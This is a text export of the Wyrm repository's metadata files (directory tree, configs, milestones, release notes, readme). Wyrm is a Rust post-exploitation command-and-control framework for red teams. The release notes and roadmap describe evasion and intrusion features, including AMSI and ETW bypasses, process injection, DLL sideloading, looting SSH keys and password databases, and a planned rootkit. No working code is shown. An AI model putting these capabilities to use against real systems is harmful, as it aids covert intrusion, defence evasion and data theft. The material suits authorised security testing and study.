Full Code of 0xflux/Wyrm for AI

master a6bb5093ed3c cached
171 files
693.8 KB
178.5k tokens
627 symbols
1 requests
Download .txt
Showing preview only (742K chars total). Download the full file or copy to clipboard to get everything.
Repository: 0xflux/Wyrm
Branch: master
Commit: a6bb5093ed3c
Files: 171
Total size: 693.8 KB

Directory structure:
gitextract_j_8agxu3/

├── .dockerignore
├── .gitignore
├── .vscode/
│   └── settings.json
├── CONTRIBUITIONS.md
├── Cargo.toml
├── LICENCE
├── Milestones.md
├── RELEASE_NOTES.md
├── Readme.md
├── c2/
│   ├── Cargo.toml
│   ├── Dockerfile
│   ├── Readme.md
│   ├── migrations/
│   │   ├── 20250614124105_agent_table.sql
│   │   ├── 20250614124140_add_sleep.sql
│   │   ├── 20250614132037_tasks.sql
│   │   ├── 20250615070633_flesh_table.sql
│   │   ├── 20250615072852_add_col_back_tasks.sql
│   │   ├── 20250615085223_add_uid.sql
│   │   ├── 20250615085245_add_uid.sql
│   │   ├── 20250615211204_rm_col_from_tasks.sql
│   │   ├── 20250616171233_ch_col.sql
│   │   ├── 20250619055731_results_table.sql
│   │   ├── 20250621175632_add_time.sql
│   │   ├── 20250621180355_add_time.sql
│   │   ├── 20250622075242_agent_staging.sql
│   │   ├── 20250622080004_protect_staging.sql
│   │   ├── 20250622080748_remove_constraint.sql
│   │   ├── 20250622083052_add_col_staging.sql
│   │   ├── 20250622094131_add_col_staging_again.sql
│   │   ├── 20250622094232_del_col_agent.sql
│   │   ├── 20250622122051_protect_pe_name.sql
│   │   ├── 20250622130349_port_to_agent_staging.sql
│   │   ├── 20250622154423_operator_table.sql
│   │   ├── 20250622161952_db_add_cstr.sql
│   │   ├── 20250624164511_col_for_toks.sql
│   │   ├── 20250627184526_default_env.sql
│   │   ├── 20250712164452_update_field_for_sleep.sql
│   │   ├── 20250712164815_update_field_for_prt.sql
│   │   ├── 20250712165040_update_field_for_prt_again.sql
│   │   ├── 20250719090503_rm_constraint_upload.sql
│   │   ├── 20250727101559_xor_payload.sql
│   │   ├── 20251025085314_update_time_completed_field.sql
│   │   ├── 20251026120715_change_dt_field.sql
│   │   ├── 20251026121136_change_dt_field_2.sql
│   │   ├── 20251026122000_time_comp_rm.sql
│   │   ├── 20251026144632_add_agent_id_to_ct.sql
│   │   ├── 20251119185937_add_pulled_col.sql
│   │   ├── 20251127184944_download_col.sql
│   │   ├── 20251127193415_make_bigint.sql
│   │   ├── 20251207091938_beacon_console_line.sql
│   │   ├── 20251207092341_testagent.sql
│   │   ├── 20251215120000_completed_tasks_pending_idx.sql
│   │   └── 20251215123000_tasks_fetched_default.sql
│   └── src/
│       ├── admin_task_dispatch/
│       │   ├── dispatch_table.rs
│       │   ├── execute.rs
│       │   ├── implant_builder.rs
│       │   └── mod.rs
│       ├── agents.rs
│       ├── api/
│       │   ├── admin_routes.rs
│       │   ├── agent_get.rs
│       │   ├── agent_post.rs
│       │   └── mod.rs
│       ├── app_state.rs
│       ├── db.rs
│       ├── exfil.rs
│       ├── logging.rs
│       ├── main.rs
│       ├── middleware.rs
│       ├── net.rs
│       ├── pe_utils/
│       │   ├── mod.rs
│       │   └── types.rs
│       └── profiles.rs
├── client/
│   ├── Caddyfile
│   ├── Cargo.toml
│   ├── Dockerfile
│   ├── index.html
│   ├── src/
│   │   ├── controller/
│   │   │   ├── build_profiles.rs
│   │   │   ├── dashboard.rs
│   │   │   └── mod.rs
│   │   ├── main.rs
│   │   ├── models/
│   │   │   ├── dashboard.rs
│   │   │   └── mod.rs
│   │   ├── net.rs
│   │   ├── pages/
│   │   │   ├── build_profiles.rs
│   │   │   ├── dashboard.rs
│   │   │   ├── file_upload.rs
│   │   │   ├── logged_in_headers.rs
│   │   │   ├── login.rs
│   │   │   ├── logout.rs
│   │   │   ├── mod.rs
│   │   │   └── staged_resources.rs
│   │   └── tasks/
│   │       ├── mod.rs
│   │       ├── task_dispatch.rs
│   │       ├── task_impl.rs
│   │       └── utils.rs
│   └── static/
│       ├── main_styles.css
│       └── styles.css
├── docker-compose.yml
├── implant/
│   ├── .cargo/
│   │   └── config.toml
│   ├── Cargo.toml
│   ├── Readme.md
│   ├── build.rs
│   ├── rust-toolchain.toml
│   ├── set_dbg_env.ps1
│   └── src/
│       ├── anti_sandbox/
│       │   ├── memory.rs
│       │   ├── mod.rs
│       │   └── trig.rs
│       ├── comms.rs
│       ├── entry.rs
│       ├── evasion/
│       │   ├── amsi.rs
│       │   ├── etw.rs
│       │   ├── mod.rs
│       │   └── veh.rs
│       ├── execute/
│       │   ├── dotnet.rs
│       │   ├── ffi.rs
│       │   └── mod.rs
│       ├── lib.rs
│       ├── main.rs
│       ├── main_svc.rs
│       ├── native/
│       │   ├── Readme.md
│       │   ├── accounts.rs
│       │   ├── filesystem.rs
│       │   ├── mod.rs
│       │   ├── processes.rs
│       │   ├── registry.rs
│       │   └── shell.rs
│       ├── spawn_inject/
│       │   ├── early_cascade.rs
│       │   ├── injection.rs
│       │   └── mod.rs
│       ├── stubs/
│       │   ├── mod.rs
│       │   ├── rdi.rs
│       │   └── shim.rs
│       ├── utils/
│       │   ├── allocate.rs
│       │   ├── comptime.rs
│       │   ├── console.rs
│       │   ├── export_comptime.rs
│       │   ├── mod.rs
│       │   ├── pe_stomp.rs
│       │   ├── proxy.rs
│       │   ├── strings.rs
│       │   ├── svc_controls.rs
│       │   └── time_utils.rs
│       ├── wofs/
│       │   └── mod.rs
│       └── wyrm.rs
├── loader/
│   ├── .cargo/
│   │   └── config.toml
│   ├── Cargo.toml
│   ├── build.rs
│   └── src/
│       ├── export_comptime.rs
│       ├── injector.rs
│       ├── lib.rs
│       ├── main.rs
│       ├── main_svc.rs
│       └── utils.rs
├── nginx/
│   └── nginx.conf
├── resources/
│   ├── .$wyrm_staging.drawio.bkp
│   └── wyrm.excalidraw
├── shared/
│   ├── Cargo.toml
│   ├── readme.md
│   └── src/
│       ├── lib.rs
│       ├── net.rs
│       ├── stomped_structs.rs
│       ├── task_types.rs
│       └── tasks.rs
├── shared_c2_client/
│   ├── Cargo.toml
│   ├── readme.md
│   └── src/
│       └── lib.rs
├── shared_no_std/
│   ├── Cargo.toml
│   └── src/
│       ├── export_resolver.rs
│       ├── lib.rs
│       └── memory.rs
└── wofs_static/
    └── Readme.md

================================================
FILE CONTENTS
================================================

================================================
FILE: .dockerignore
================================================
.git
.gitignore
**/target
**/*.pdb
**/*.exe
**/*.dll

================================================
FILE: .gitignore
================================================
c2/target
target
implant/target
client/target
client_v2/target
shared/target
shared_c2_client/target
/c2/staged_files/*
/c2/logs/*
/c2/loot/*
*Cargo.lock
*.exe
*.dll
*.svc
/client-leptos/dist
/client/dist
*.pem
c2_transfer/*
wofs_static/*
# But do track readme changes
!wofs_static/Readme.md

# Ignore user defined profiles, dont want to overwrite those
c2/profiles/*.toml
# Track the example profile - 
!c2/profiles/profile.example.toml

# Now the env file is setup, we want to ignore it for future commits to prevent overwriting.
.env
client-leptos/dist/index.html
client/dist/index.html


================================================
FILE: .vscode/settings.json
================================================
{
    "cSpell.words": [
        "AMSI",
        "antisandbox",
        "appdomain",
        "askama",
        "Autoloot",
        "AVEH",
        "BASERELOC",
        "bootstrapper",
        "BSTR",
        "canonicalise",
        "canonicalised",
        "checkin",
        "chrono",
        "clippy",
        "comptime",
        "conout",
        "creds",
        "crypter",
        "curproc",
        "dazy",
        "dbgprint",
        "deconflictions",
        "Deque",
        "derefs",
        "descript",
        "deser",
        "deserialise",
        "devlogs",
        "disasm",
        "DLLLOADED",
        "dont",
        "doppleganging",
        "dotenv",
        "dotenvy",
        "dotex",
        "doxtex",
        "entryp",
        "ENTRYW",
        "exfil",
        "FARPROC",
        "filesytem",
        "fingerprintable",
        "Flink",
        "funcs",
        "Ghostscale",
        "gitbook",
        "gloo",
        "HINSTANCE",
        "HKCR",
        "HKCU",
        "HKLM",
        "hmod",
        "HORIZ",
        "hres",
        "htmx",
        "icall",
        "Idek",
        "impr",
        "initialiser",
        "itemised",
        "kdbx",
        "keygen",
        "KHTML",
        "klist",
        "laxy",
        "ldapsearch",
        "Ldrp",
        "Leptos",
        "lfanew",
        "locationchange",
        "lpaddress",
        "lpsz",
        "LPTHREAD",
        "lstrlen",
        "luid",
        "macroise",
        "minreq",
        "MODULEINFO",
        "msvc",
        "MSVCRT",
        "nanos",
        "NGBP",
        "NGPB",
        "NOACCESS",
        "nonoverlapping",
        "nostd",
        "notif",
        "ntdll",
        "OPSEC",
        "ords",
        "Overwatch",
        "parray",
        "pathing",
        "PCSTR",
        "PCWSTR",
        "PFNSE",
        "pider",
        "PLAINTXT",
        "popstate",
        "postex",
        "ppid",
        "PROCESSENTRY",
        "psexec",
        "ptrs",
        "PWSTR",
        "rdata",
        "RDLL",
        "READWRITE",
        "recognised",
        "regq",
        "reloc",
        "repr",
        "reqwest",
        "retval",
        "RIID",
        "rngs",
        "RNTIME",
        "roff",
        "rotr",
        "Rubeus",
        "rundll",
        "runpoline",
        "rustc",
        "rustls",
        "rustup",
        "rwlock",
        "SAFEARRAY",
        "SAFEARRAYBOUND",
        "Seedable",
        "Serialise",
        "serialised",
        "serialising",
        "servertime",
        "Shellcode",
        "sideloaded",
        "sideloading",
        "Smkukx",
        "smth",
        "Smukx",
        "SNAPALL",
        "sqlx",
        "STARTUPINFO",
        "STARTUPINFOA",
        "STARTUPINFOEXA",
        "STARTUPINFOW",
        "strs",
        "subdirs",
        "svchost",
        "tchars",
        "termiantor",
        "thiserror",
        "thje",
        "timestomp",
        "timestomping",
        "Toolhelp",
        "TOPT",
        "trustedsec's",
        "turbofish",
        "Unaccess",
        "Uninit",
        "UNLEN",
        "ureq",
        "useragent",
        "Voidheart",
        "vtable",
        "Vtbl",
        "Whelpfire",
        "WINHTTP",
        "wofs",
        "WRITECOPY",
        "wyrm",
        "xored",
        "xwin",
        "yara"
    ],
    "[rust]": {
        "editor.defaultFormatter": "rust-lang.rust-analyzer",
        "editor.formatOnSave": true,
    },
    "cSpell.language": "en,en-GB",
    "rust-analyzer.procMacro.ignored": {
        "leptos_macro": [
            // optional:
            // "component",
            "server"
        ],
    },
    "rust-analyzer.cargo.features": "all",  // Enable all features
    "rust-analyzer.cargo.buildScripts.enable": true,
}

================================================
FILE: CONTRIBUITIONS.md
================================================
# Contributions

Contributions as PR's are not currently accepted.

Please use the issues tab or discussions as required.

The `.env` file should be removed from future commits - run `git update-index --skip-worktree .env` locally to ensure it is 
not tracked.

## Branch naming conventions

- `vx.y`: The main development branch for an upcoming release.
- `feat/*`: Implementing a new feature.
- `bug/*`: Fixing a bug, tracked against an issue number where relevant.
- `impr/*`: Improving something that already exists.

================================================
FILE: Cargo.toml
================================================
[workspace]
resolver = "2"
members = ["c2", "client", "implant", "loader", "shared", "shared_c2_client", "shared_no_std"] 


================================================
FILE: LICENCE
================================================
MIT License

Copyright (c) 2025 flux

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

================================================
FILE: Milestones.md
================================================
# Project Milestones

Any item with a (L) tag is a contribution which will not be live (or requires further decision making) as this is intended to be
developed as a premium or otherwise private feature. These will be few and far between.

## (L) Features (locked currently for public consumption)

1) [ ] NG Proxy Bypass (NGPB).
2) [ ] Additional loaders / start from RDLL - configurable, maybe things like early bird, syscalls, etc.
3) [ ] Image hashes in autoloot.
4) [ ] Runtime obfuscation, sleep masking - should spawn from the RDI bootstrap? Shellcode? Where and how? The RDI alloc for the actual DLL can just be encrypted?
5) [ ] **Entire** website clone, and serve download from named page.
6) [ ] Ransomware **SIMULATION** for Business
7) [ ] Execute dotnet in sacrificial process

### v0.7.3

1) [ ] `can_hijack`
   1) [ ] Specify a path to the image, and Wyrm tells you if you can SOH - this would be great for process injection without risking process injection triggers that an EDR could pick up
   2) [ ] Docs
2) [ ] The loader should inherit option for ETW bypass
3) [ ] `inject` malleable options (malleable options for it to inject on spawn from the default loader)
4) [ ] `spawn` should take a param (last position) if not in profile to spawn as
5) [ ] `spawn` should give the operator the pid of the spawned process
6) [ ] Go back and refactor `wyrm.rs` to use `task.deserialise_metadata::<InjectInnerForPayload>()` generics
7) [ ] Investigate inject behaviour in calc (some instability found on use)
8) [ ] C2 should have delete option for staged payloads

### v1.0 - Whelpfire

1) [ ] `jump psexec`
2) [ ] Final OPSEC review on binary indicators to make sure nothing is introduced in this version.
3) [ ] Max upload size set on C2 from profile
4) [ ] Logrotate setup &/ cargo clean?
5) [ ] Link additional modules at comptime into the C2 or agent (via profiles), e.g. to enable NGPB or other custom toolkits.
6) [ ] Separate URIs for POST and GET
7) [ ] Multiple URLs / IPs for C2
8) [ ] Round robin and different styles for URI & URL rotation
9) [ ] Can I tidy wyrm.rs, maybe dynamic dispatch and traits for main dispatch fn?
10) [ ] Loaders should stomp the MZ and "this program.."
11) [ ] Support domain fronting through HTTP headers in malleable profile (check in comms code `.with_header("Host", host)`)
12) [ ] Staging the encrypted payload as opposed to a stageless only build
13) [ ] When sideloaded no console output coming through
14) [ ] EDR shim removal? https://malwaretech.com/2024/02/bypassing-edrs-with-edr-preload.html
15) [ ] Can I make it x86?
16) [ ] Consider a javascript scripting kit (look at nuclei) (suggestion by @sindhwadrikunj)
17) [ ] Other spawn / inject options
18) [ ] WOF API's
    1)  [ ] C2 download file
    2)  [ ] C2 print info / print fail
19) [ ] Stack spoofing for unbacked memory
20) [ ] AMSI option in profile for classic bypass or VEH^2

### v1.1

These are to be split out further as required for more manageable releases.

1) [ ] Long running tasks which have a specified integrity level, so any task set under this scheme can execute at a given integrity level for that machine
2) [ ] Killing the agent should support from thread as well as from process (in the case of an injected process).
3) [ ] Agent & C2 supports multiple endpoints (selectable in build process from cli) / c2 profiles
   1) This needs to be implemented in the wizard also
4)  [ ] `zip` command to natively zip a folder
5)  [ ] Improve pillage function
6)  [ ] Concurrent removable media scanner - runs when main thread is sleeping between calls and looks for a removable disk being added. Auto-pillage.
   1)  [ ] The auto pillage file extensions should be specified in the profile toml
7)  [ ] Auto Escalator (this could be done a separate project that can be used by others, but also compiles into this):
    1)  [ ] User -> SYSTEM (service paths etc)
    2)  [ ] Local user -> Local Admin
    3)  [ ] Local Admin -> SYSTEM
8)  [ ] Improved anti-sandbox checks
9)  [ ] Additional lateral movement options
10) [ ] C2 junk padding response size (needs to play nice with NGPB)
11) [ ] Export agent db info for reporting
12) [ ] Read users clipboard continuously and upload to C2
13) [ ] Multiple C2 implementations on the agent. This could be a task which orders the creation on the implant itself.
14) [ ] Capture screenshots
15) [ ] Autoloot:
    1)  [ ] SSH keys
    2)  [ ] Filenames of office docs, .pdf, .jpg, .mov, .kdbx
16) [ ] Builds agent that can use APIs via hells/halos gate, etc.
    1)  [ ] Look at FreshyCalls as an alternate
17) [ ] Pool Party
18) [ ] C2 rotation strategy from profile
19) [ ] `cat`
20) [ ] `tasks` and `task_kill`
21) [ ] SOCKS proxy
22) [ ] Shellcode loader
23) [ ] C2 configurable so it is hosted on TOR, with C2 fronted redirectors into the TOR network
24) [ ] `drives` search for additional drive volumes
25) [ ] Scope / date / time checks
26) [ ] Add a note to an implant
27) [ ] Some UAC bypasses?
28) [ ] Specify specific proxy for agent to use

### Voidheart - v2.0

These are to be split out further as required for more manageable releases.

1) [ ] Run tools in memory and send output back to operator
2) [ ] C2 over DNS / DOH
3) [ ] SMB agents
4) [ ] Allow multiplayer
5) [ ] Time-stomping for builds & also agent can stomp files on target
6) [ ] Any inspiration from [trustedsec's BOFs](https://github.com/trustedsec/CS-Situational-Awareness-BOF) around some sitrep stuff this can do?
   1)  [ ] `ldapsearch`
7) [ ] 'Overwatch' system on the C2
8) [ ] TOPT
9)  [ ] Add ability to protect staged downloads with a header `key=value`, to try prevent mass downloading of an agent in cases where the operator wants it behind a check
10) [ ] Post Quantum Encryption for below TLS implant comms
11) [ ] Create multiple users 
    1)  [ ] Make implant multiplayer - this may need a bit of rearchitecting

### Ashen Crown - v3.0

1) [ ] Wyrm Rootkit release
2) [ ] Wyrm rootkit loader

### Ghostscale - v4.0

Nothing planned yet.

================================================
FILE: RELEASE_NOTES.md
================================================
# Release Notes

Anything found labelled with a '&#128679;' indicates a possible breaking change to a profile which you will need to adjust from
the `default.example.profile` found in `/c2/profiles/`. This is done especially as to not overwrite your custom profiles when
pulling updates.

**IN ANY CASE ALWAYS BACKUP YOUR PROFILES BEFORE UPDATING!!!!**

## v0.7.2

- Makes stable the `spawn` command (x64 only) which now uses Early Cascade Injection to launch a new agent. There are question marks over the effectiveness of this against EDR's thanks to the work of [Smukx](https://x.com/5mukx/). Leaving in as the default now; further options to be explored before v1.0 is released.
- `Wyrm Object Files` are introduced which are small, self-contained code modules that are baked into the implant at compile time. This allows you to extend the functionality of Wyrm and bring in your custom tooling without having to understand the entire source code of Wyrm to implement additional custom functionality. You can simply invoke the wof at runtime via `wof <function_name> (optional input)`. See docs for full explanation.
- Process injection introduced via the `inject <payload> <pid>` command.
- Improves AMSI bypass technique by using [VEH Squared](https://fluxsec.red/vectored-exception-handling-squared-rust) instead of patching the function entry for AmsiScanBuffer.
- Reflective DLL stub now inherits the ETW patching option if specified in the profile.
- Significantly improves stability of C2 where resource exhaustion was happening because I used `scc` when trying to optimise some time ago, switched to normal `HashMap` and `RwLocks` and it runs a dream. Incidently, this led to the server locking out. Further improved stability by reducing lock contention over awaits.
- Internal refactoring, nothing to write home about, but still nice improvements from a code perspective.
- Debug builds should print output to the debug console (accessible via DebugView) - thanks to [@c5pider](https://x.com/C5pider) and [@RastaMouse](https://x.com/_RastaMouse) for that idea :)

## v0.7.1

- Bug fix for the reflective DLL - it was not fully reflective in v0.7, I left some of the logic in the injector which has been migrated to the rDLL bootstrap mechanism. The rDLL should now be reflective from external tooling (so long as you start execution at the `Load` export).
- Introduces an **early preview** of the `spawn` command - you can spawn a new Wyrm agent impersonating `svchost`. To use this you must have either the loader or the raw payload (DLL version) on disk (on the target) and you can run it via: `spawn "path/to/dll"`. Bundling this in as there was the above critical update to the rDLL. It is **NOT** recommended you use this as I am still building it, if you want to, feel free - but it may break or trigger AV right now.

## v0.7

- Wyrm now builds as a reflective DLL, supplying you with a loader DLL, exe and svc in place of the previous raw binary. Meaning in your build, for each profile you now get
  - Raw binaries for when you wish to use them with your own loaders / toolsets (exe, svc and dll) where the DLL version is set up for **reflective** loading via the `Load` export. See the [docs](https://docs.wyrm-c2.com/implant/rdll.html) for more info on how to use the reflective loader export.
  - A loader using the reflective injector of the DLL, giving you an exe, svc and dll - all which load the rDLL into the **current** process. Support for process injection coming later. This is XOR 'encrypted' in the .text section of the loader.
- `pull` command now does so buffered in memory, preventing resource exhaustion from the implant.
- Native support for running `whoami` without needing to touch powershell. Run `whoami` to get info on the domain, user, SID and what privileges are assigned.
- Implant is now **proxy aware**! This means it will attempt to use a corporate proxy if set up for making connections. If none exists, then none will be used! This is done per request to ensure the correct proxy settings are applied to the correct C2 address if using multiple.
- Binary size of the postex payload almost HALVED! Down to about 800 kb!
- Fix logging on C2 to log correct IP with NGINX X-Forwarded-For header.
- Moved implant to reqwest crate for networking from minreq, no real impact on agent size and provides more functionality.
- Fix bug where implant tried to register a mutex when not specified.
- Fix bug in file upload via GUI to the C2 in that it happens much faster.
- Improve how the C2 handles panics and unwraps using `catch_panic`, the  C2 should no longer become unresponsive during panics. Using panics and unwraps was by design, so this should add stability.
- Improved stability with the automatic DLL proxying for search order hijacking.

### Known Issues

- When the DLL is loaded via sideloading, no debug prints or console prints from dotnet tooling are captured.

## v0.6

- AMSI patching available in the implant via the malleable profile (only runs in the agent when necessary).
- You can now execute dotnet programs remotely in the agent, all in memory - does not write anything to disk! Simply run `dotex` and pass your args after, e.g. `dotex Rubeus.exe klist` (see below point as to how to get the binary sent to the agent)!
- This update introduces the `c2_transfer` dir in the root which is used for staging files to be internally used by the C2 during operations such as `dotex` where the payload is sent as bytes to the agent through C2. This folder is a bind mount meaning you can drop files in ad-hoc whilst the server is running and it should be able to read them. If you drop tools in here in a folder, make sure you include that in the path to the tool.
- Agent prints get sent to the server - meaning if you build in debug mode you can see the debug output in the terminal on the c2. This is mainly due to now removing the console window from the application.
- The CRT (C Runtime) is now statically linked into the binary so it can run on machines without the MSVCRT DLLs.
- Some nice UI changes
- Bug fix with parsing config on C2, some options were being left out under certain conditions.

## v 0.5.3

- Potential bug fix for the UI very occasionally not showing messages in the UI. Seems to be fixed.. but the bug happens so little it can be hard to diagnose.

## v 0.5.2

- DLL internals now allow for a better loading mechanism which ensures if run via rundll32, and from DLL Search Order Hijacking, without early termination.
- Malleable profile now provides support for fully fledged DLL Search Order Hijacking attacks! See docs for more info.
- Malleable profile now includes the ability to create a global mutex so you can ensure only one implant (profile) can run on the system, this could be useful for DLL sideloading / search order hijacking if the target is extremely noisy in terms of lots of subprocesses loading in the binary. You can of course have this applied to one profile, but not another, as it is fully optional.
- Improves the output of the `ps` and `reg query` commands.
- Added additional deserialisation option for output of `reg query` such that the `REG_BINARY` type gets decoded.

### Issues under investigation

There is still a very rare, small case where the first few instructions get dispatched and sent to the client, but don't appear in the console. They are logged in the browser store temporarily, but I think the bug is still here.. under investigation - extremely rare which is making it difficult to determine if it is still an issue.

## v 0.5.1

- Improved GUI updates! The dashboard message panel now looks much better, with newlines appearing properly, and spacing kept from the raw output. Colours have also been improved making it much easier to distinguish between message sections!
- Improved UI printing of the `ls` command.

## &#128679; v 0.5

### &#128679; Breaking changes

- Introduced the .svc binary which builds as part of your build package from the C2. There is a new required field in the profile, which is **svc_name**. Read more in the Wyrm Docs profile section as to how to use this field. In short, the value of this field (required) is passed to the Windows Service Control Manager when the service binary is run.

### Non-breaking changes

- Introduced the **string scrubber**!
  - The string scrubber automatically scrubs 'implant.dll' from the export name of the Wyrm DLL.
  - The string scrubber allows through a malleable profile the ability to scrub certain strings from the binary. **Warning:** this interprets bytes like for like and either allows you to replace them, or zero them out. This could lead to accidental pattern collisions with machine code / other artifacts, so if you are using this feature, be sure to test the binary before deployment on a red team op!
- Added download counter for staged resources (visible in new log file, and on the staged resources GUI page).
- Fixed bug (again..) that was preventing messages showing in the GUI, even though they were processed by the client. Hopefully that is the end of that bug!

## v 0.4.4

- Introduces the profile options to build custom DLL export names, as well as define custom machine code to run at an export. This could be used for DLL Sideloading (better support for that coming later, but it should still work in some cases), OPSEC, or just causing a bit of mayhem for a blue teamer.

## &#128679; v 0.4.3

- Investigated whether error logging was happening (the C2 hasn't generated an error in a long time) - confirmed error handling works as expected. This is good.
- Fixes bug which caused some results not to print to an agents console.
- Fixes bugs with file drop via the implant; now correctly drops a file in the 'in memory' working directory of the beacon.

### &#128679; Breaking changes

- Removed most of the environment variable requirements (see docs for instructions).
- This update brings a change to profiles! You now have one profile, and only one, which exists in the `c2/profiles/*.toml` file. You now specify multiple implants by key to build, or alternatively you can build all implant profiles by typing 'all' on the profile builder. See the [docs](https://docs.wyrm-c2.com/) for how to set the profile up, example is provided.

## v 0.4.2

- Fixes bug which prevented user logging into C2 for the first time if no user is created.

## &#128679; v 0.4.1

### &#128679; Breaking changes

- The C2 now uses nginx as part of the docker stack to serve the C2 over TLS. This was an important design decision whilst re-working the server; we are moving away from the previous method of authentication (which re-authenticates each time and will be more CPU intensive than required). Now, we use HTTPS secure cookies to enable the login sessions. Because of this change, you now need to generate a certificate and its private key, and they need to be placed into `/nginx/certs/` named `cert.pem` and `key.pem` respectively. For localhost testing, see my guide on [creating trusted certificates](https://fluxsec.red/wyrm-c2-localhost-self-signed-certificate-windows) locally - failing to do this will result in no connectivity on **localhost**. For prod, create a cert as you see fit (`certbot` / purchased certificates / from a CA, etc..) and add them to the `nginx/certs` dir, updating the `/nginx/nginx.conf` as necessary.
- As Wyrm now uses nginx via Docker, you need to configure the configuration file in `/nginx/nginx.conf`. This file is provided for you in git tracking. **Note:** when v0.4.1 is pushed, I will not be tracking changes to this file so that it doesn't accidentally break a build.
  - Edit `server_name` as appropriate for both HTTP and HTTPS.
  - Edit other settings as you see fit; note, the CORS stuff is mandatory as the GUI is separate from the server.
- You now log into the C2 entering the address of: https://localhost into the login panel (at http://localhost:3000)

### Non-breaking changes

- We now use a better, more efficient, and more secure authentication method of using actual auth HTTPS only tokens with a lifetime of **12 hrs** before you need to log in again to get a new token.
- Fix bug which caused tasks on implant to be dispatched out of order.
- Fixed bug causing console output to appear in the wrong order on the GUI.
- C2 now has docs! https://docs.wyrm-c2.com/

## &#128679; v 0.4

### &#128679; Breaking changes

- `.env` migrated from `/c2` to `/` - **THIS MAY AFFECT YOUR ADMIN TOKEN AND OTHER ENVIRONMENT SETTINGS, PLEASE BACK-UP BEFORE UPDATING**.
- Docker build pipeline for client now moved to workspace root rather than from within the `/client` directory. To build the client, now run (from the workspace root): `docker compose up -d --build client`.
- No more `install.sh`! You run the C2 via docker, simply with: `docker compose up -d --build  c2` from the root directory. This means you can run both the client and c2 via docker.
  - Client: `docker compose up -d --build client`.
  - C2: `docker compose up -d --build c2`.
- Loot, staged resources, and logs can be found in the docker volume /data.

### Non breaking changes

- OPSEC improvement with removing static artifacts from the binary.
- Introduces timestomping for the compile date on built implants - see `profile.example.toml` for full docs, but this optional profile option allows you to select a date in **British format** which is stamped into the binary as the compile date, aiding advanced OPSEC.
- Introduces the ability to export the completed tasks of the agent to a json file (for ingesting into ELK etc) by running the `export_db` command on an agent.
- Completed tasks now mapped to MITRE ATT&CK!
- Introduces the registry manipulation features with `reg query`, `reg delete` and `reg add` commands.
- Improve docker build process for the client through [cargo chef](https://lpalmieri.com/posts/fast-rust-docker-builds/).
- Implant supports `rm` to remove a file, and `rm_d` to remove a directory (and all its children).
- Adds user name who is running processes, as well as the ability to show processes running at a higher privilege (if running with high integrity).
- Improved how the system records time an action was completed, now properly represents the time the agent actually did the work, vs what was in place which was when the result was posted to the server and processed by the database.
- Improved HTTP packet ordering to be more concise and clear, using repr(C) to ensure consistent ordering under the new packet layout.

## v 0.3

This release introduces the new GUI, which is a web based UI used to interact with the Wyrm C2.

- New web based GUI!
- Docker is used to build and deploy the GUI, making it really straightforward.
- Building payloads now downloads as a 7zip archive through the browser.
  - Install `sh` script updated to include 7z dependencies, if manually updating through a pull; make sure you have 7zip installed and available on PATH.

## v 0.2

- Wyrm C2 now uses profiles to build agents with fully customisable configurations.
- IOCs are encrypted at compile time in the payload.
- Events Tracing for Windows (ETW) patching support via customisable profile.
- Profile options to determine log fidelity of the C2.
- Jitter supported in profile, as a percentage of the maximum sleep value time in seconds.
- Investigated apparent bug where results of running tasks appear out of order. The agent does not execute them out of order, this is a GUI display bug. Not fixing at this moment in time as I am building a new GUI for this in an upcoming pre-release version.

================================================
FILE: Readme.md
================================================
# Wyrm - v0.7.2 Hatchling

Wyrm (pronounced 'worm', an old English word for 'serpent' or 'dragon') is a post exploitation, open source, Red Team security testing framework framework, written in Rust designed to be used by Red Teams, Purple Teams, 
Penetration Testers, and general infosec hobbyists. This project is fully built in Rust, with extra effort going into obfuscating artifacts which
could be present in memory. Project created and maintained by [flux](https://github.com/0xflux/), for **legal authorised security testing only**.

![Wyrm C2](resources/splash_example.png)

Read the docs at https://docs.wyrm-c2.com/ for quick setup instructions. Or jump in to read about [customisable profiles](https://docs.wyrm-c2.com/implant/profiles/), 
[evasion](https://docs.wyrm-c2.com/implant/profiles/evasion.html), and [obfuscation](https://docs.wyrm-c2.com/implant/profiles/obfuscation.html). The docs
will be updated as the project grows and gains more capabilities.

Pre-release version. If you want to support this project, please give it a star! I will be releasing updates and
devlogs on my [blog](https://fluxsec.red/) and [YouTube](https://www.youtube.com/@FluxSec) to document progress, so please give me a follow there.

**IMPORTANT**: Before pulling updates, check the [Release Notes](https://github.com/0xflux/Wyrm/blob/master/RELEASE_NOTES.md) for any 
breaking changes to profiles / configs which you may need to manually adjust or migrate. This is done especially so that updates do not
overwrite your local configs and agent profiles.

## Post exploitation Red Team framework

Wyrm currently supports only HTTPS agents using a custom encryption scheme for encrypting traffic below TLS, with a unique packet design so that
the packets cannot be realistically decrypted even under firewall level TLS inspection.

Updates are planned through versions 1,0, 2.0, 3.0, and 4.0. You can view
the planned roadmap in this project (see [Milestones.md](https://github.com/0xflux/Wyrm/blob/master/Milestones.md)). In time, this is designed to be an open source competitor to **Cobalt Strike**, **Mythic**, **Sliver**, etc.

For any bugs, or feature requests, please use the Issues tab, and for anything else - please use GitHub Discussions. I am active on this project,
so I will be attentive to anything raised.

### Features

- Implant uses a configurable profile to customise features and configurations
- You can customise the Wyrm agent via WOFs (Wyrm Object Files) which are statically linked C code or other language (Rust, etc) object files
- Fully reflective DLL model + a basic loader provided
- Access to raw binaries as well as ones prepared with a loader if you wish to use your own tooling with Wyrm
- Intuitive auto-DLL search order hijacking & sideloading features via profiles
- IOCs encrypted in the payload to assist in anti-analysis and anti-yara hardening
- Implant transmits data encrypted below TLS, defeating perimeter inspection security tools out the box
- Dynamic payload generation
